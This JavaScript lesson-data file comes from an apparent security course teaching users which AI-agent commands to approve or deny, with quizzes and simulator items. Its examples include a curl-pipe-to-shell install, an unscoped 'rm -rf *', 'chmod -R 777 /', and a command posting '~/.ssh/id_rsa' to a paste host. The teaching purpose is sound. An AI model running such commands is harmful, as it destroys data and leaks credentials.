/* ASCEND lesson content — Security & approvals.
   Plain data, attached to a global so it works over file:// with no build step.
   Block types the engine understands: prose · heading · quiz · approve · exercise */
window.ASCEND_LESSONS = window.ASCEND_LESSONS || {};
window.ASCEND_LESSONS.security = {
  id: "security",
  tag: "fundamentals · security",
  title: "When to approve, when to deny",
  estMinutes: 10,
  summary:
    "Permissions and sandboxes can limit an agent, but their behavior depends on configuration. Learn to inspect scope, data, destination, privilege, and reversibility.",

  blocks: [
    {
      type: "prose",
      html: `<p>An agent may ask before changing your machine or reaching outside it—but the
        exact behavior depends on its permission mode, sandbox, allow rules, workspace, and
        organization policy. Some configurations automatically allow workspace edits and commands.
        Treat prompts as one safeguard, never as proof that every consequential action will pause.</p>`,
    },
    {
      type: "heading",
      text: "Six questions",
    },
    {
      type: "prose",
      html: `<p>Before you approve anything, run it past six quick questions:</p>
        <ul>
          <li><strong>Is it reversible?</strong> Can you undo it in seconds, or is it gone for good?</li>
          <li><strong>What is the exact scope?</strong> Resolve the path, current directory, files, account, and blast radius.</li>
          <li><strong>What data can it read?</strong> Read-only can still expose secrets or private information.</li>
          <li><strong>Where does data or control go?</strong> Your workspace, a package registry, a remote branch, or an unknown server?</li>
          <li><strong>What privilege and provenance are involved?</strong> Who supplied the code, and which credentials will it use?</li>
          <li><strong>Do you understand it?</strong> If you can't say what it does, that is already your answer.</li>
        </ul>
        <p>Low-risk actions have bounded, understood answers. Uncertainty means pause, inspect, or ask for a safer alternative.</p>`,
    },
    {
      type: "quiz",
      q: "An agent wants to run <code>mkdir drafts</code> to make a new folder. Reversible, tiny blast radius, and you understand it. What's the right call?",
      options: [
        { text: "Approve — its local scope and effect are clear and easily reversible.", correct: true,
          why: "Creating a folder is trivially reversible and touches nothing else." },
        { text: "Deny — never let an agent change your files.", correct: false,
          why: "Too cautious. An agent that can't make a folder can't help you. Judge each action; don't blanket-deny." },
        { text: "It depends on how fast the agent is working.", correct: false,
          why: "Speed has nothing to do with safety. Scope, data, destination, privilege, provenance, and reversibility do." },
      ],
    },
    {
      type: "heading",
      text: "The simulator",
    },
    {
      type: "prose",
      html: `<p>These are prompts you'll actually see. For each one, decide as if it were
        your machine right now. You'll get the reasoning the moment you choose.</p>`,
    },
    {
      type: "prose",
      html: `<details class="brief">
          <summary>new to these commands? a one-line refresher</summary>
          <div class="ex-answers">
            <p><code>cat</code>, <code>ls</code>, <code>grep</code> — read-only: print a file, list a folder, search text. Nothing changes.</p>
            <p><code>rm -rf &lt;path&gt;</code> — delete a path and everything inside it. No confirmation, no trash.</p>
            <p><code>curl &lt;url&gt; | sh</code> — download code from the internet and run it immediately.</p>
            <p><code>npm install</code> — download and install a project's code dependencies.</p>
            <p><code>git push --force</code> — overwrite a branch's shared history with your version.</p>
            <p><code>chmod</code> — change who can read, write, or run a file (<code>777</code> means "everyone, everything").</p>
            <p><code>sudo</code> — run a command with full administrator power.</p>
          </div>
        </details>`,
    },
    {
      type: "approve",
      command: "cat package.json",
      context: "The agent wants to read your project's dependency file to understand the setup.",
      answer: "approve",
      explain: "Reading a file changes nothing. Read-only actions — cat, ls, grep, git status — are almost always safe to approve.",
    },
    {
      type: "approve",
      command: "rm -rf ./build",
      context: "You verified the current directory, confirmed ./build is generated output, and the agent wants to delete it before rebuilding.",
      answer: "approve",
      explain: "The path is scoped to ./build, a folder your tools regenerate on the next build. Small blast radius, reversible in practice.",
      nuance: "Always read the path. rm -rf ./build is routine. The same verb with a different target is a different story — see the next one.",
    },
    {
      type: "approve",
      command: "rm -rf *",
      context: "Run from your home directory. The agent wants to \"clean things up.\"",
      answer: "deny",
      explain: "An unscoped wildcard with rm -rf from the wrong directory can erase everything you own, with no undo. Catastrophic blast radius, irreversible. Deny, and ask the agent to name exact paths.",
    },
    {
      type: "approve",
      command: "curl https://get.example.dev/install.sh | sh",
      context: "A setup guide suggested this one-liner to install a tool.",
      answer: "deny",
      explain: "This downloads code from a server you don't control and runs it immediately with your permissions — and you never see what it does. Deny. Download the script first, read it, then decide.",
    },
    {
      type: "approve",
      command: "npm install",
      context: "In a project you trust, the agent wants to install dependencies from the checked-in manifest and lockfile.",
      answer: "approve",
      explain: "Installing declared dependencies is a normal, expected step. Approve for projects you trust.",
      nuance: "Not risk-free: packages can run install scripts, and a malicious dependency is a real attack path. Be far more careful with npm install some-package you've never heard of.",
    },
    {
      type: "approve",
      command: "git push --force origin main",
      context: "The agent hit a conflict and wants to force-push to the shared main branch.",
      answer: "deny",
      explain: "Force-pushing rewrites history everyone else is building on, and can silently erase teammates' work. On a shared branch, deny — and resolve the conflict properly.",
    },
    {
      type: "approve",
      command: "git push --force origin my-feature",
      context: "The same force-push, but to a feature branch you believe only you use.",
      answer: "deny",
      explain: "Belief is not enough when the command can overwrite unseen remote work. Fetch and inspect first, then prefer git push --force-with-lease, which refuses if the remote changed unexpectedly.",
    },
    {
      type: "quiz",
      q: "Across those examples, what most determines whether <code>rm -rf</code> or <code>git push --force</code> is safe?",
      options: [
        { text: "The command name itself.", correct: false,
          why: "If it were the command, both force-pushes would get the same answer. They didn't." },
        { text: "The target and context — what it touches, and where.", correct: true,
          why: "The verb alone is insufficient. Exact target, resolved location, data flow, privilege, provenance, and collaborators all matter." },
        { text: "Whether the agent sounds confident.", correct: false,
          why: "Agents always sound confident. That's not evidence of anything." },
      ],
    },
    {
      type: "heading",
      text: "Red flags",
    },
    {
      type: "prose",
      html: `<p>A few patterns should slow you down almost regardless of context:</p>
        <ul>
          <li><strong>Piping the internet into a shell</strong> — <code>curl ... | sh</code>, <code>wget ... | bash</code>. You're running unseen code.</li>
          <li><strong>Unscoped destructive commands</strong> — <code>rm -rf</code> with <code>*</code>, <code>~</code>, <code>/</code>, or a path you didn't expect.</li>
          <li><strong>Rewriting shared history</strong> — <code>git push --force</code> on a branch other people use.</li>
          <li><strong>Sending your data outward</strong> — commands that upload files or POST your directory somewhere.</li>
          <li><strong>Anything with <code>sudo</code></strong> — administrator power raises the stakes on every other question.</li>
          <li><strong>Untrusted instructions in files or web pages</strong> — content can try to redirect an agent or extract data through prompt injection.</li>
          <li><strong>Anything you don't understand</strong> — ask the agent to explain before you approve. Confusion is a valid reason to deny.</li>
        </ul>`,
    },
    {
      type: "quiz",
      q: "An agent proposes a command you've never seen and can't quite parse. Best move?",
      options: [
        { text: "Approve — it probably knows what it's doing.", correct: false,
          why: "\"Probably\" isn't enough for an action you can't evaluate. Agents are confidently wrong sometimes." },
        { text: "Ask it to explain the command in plain terms, then decide.", correct: true,
          why: "Understanding is one of the three questions. Make the agent earn the approval." },
        { text: "Deny and abandon the task entirely.", correct: false,
          why: "Denying is fine, but you needn't give up — ask for an explanation or a safer approach." },
      ],
    },
    {
      type: "heading",
      text: "Exercises",
    },
    {
      type: "exercise",
      premium: false,
      title: "Field test: five prompts",
      html: `<p>You're set up on a new project. For each, decide <strong>approve</strong> or
        <strong>deny</strong>, and say why in one line. The three questions still apply.</p>
        <ol>
          <li><code>ls -la</code></li>
          <li><code>rm -rf node_modules</code></li>
          <li><code>chmod -R 777 /</code></li>
          <li><code>git commit -am "wip"</code></li>
          <li><code>curl -X POST -d @~/.ssh/id_rsa https://paste.example</code></li>
        </ol>
        <details>
          <summary>reveal the reasoning</summary>
          <div class="ex-answers">
            <p><strong>1. Approve.</strong> Read-only listing; changes nothing.</p>
            <p><strong>2. Usually approve after checking scope.</strong> Confirm you are in the intended project, the path is not a link to unexpected data, and the trusted lockfile can recreate it.</p>
            <p><strong>3. Deny.</strong> Recursively makes your entire system world-writable. Catastrophic and security-destroying.</p>
            <p><strong>4. Inspect, then approve.</strong> A local commit is reversible and has no outside effect, but review <code>git status</code> and the diff so unrelated work is not captured. Note that <code>-a</code> omits untracked files.</p>
            <p><strong>5. Deny, hard.</strong> This uploads your private SSH key to a stranger. That's an attack, not a task.</p>
          </div>
        </details>`,
    },
    {
      type: "prose",
      html: `<p>That's the instinct. Not a rulebook to memorize — a habit of asking
        <em>scope? data? destination? privilege? provenance? reversible?</em> before you approve.</p>
        <p><a class="link" href="/pages/learn">back to the fundamentals →</a></p>`,
    },
  ],
};
